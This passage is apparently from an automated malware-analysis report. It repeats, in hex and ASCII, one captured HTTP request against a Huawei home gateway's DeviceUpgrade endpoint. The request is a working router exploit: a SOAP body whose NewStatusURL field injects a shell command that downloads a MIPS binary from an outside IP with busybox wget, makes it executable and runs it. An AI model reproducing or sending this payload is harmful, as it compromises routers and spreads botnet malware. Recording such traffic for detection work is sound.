HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
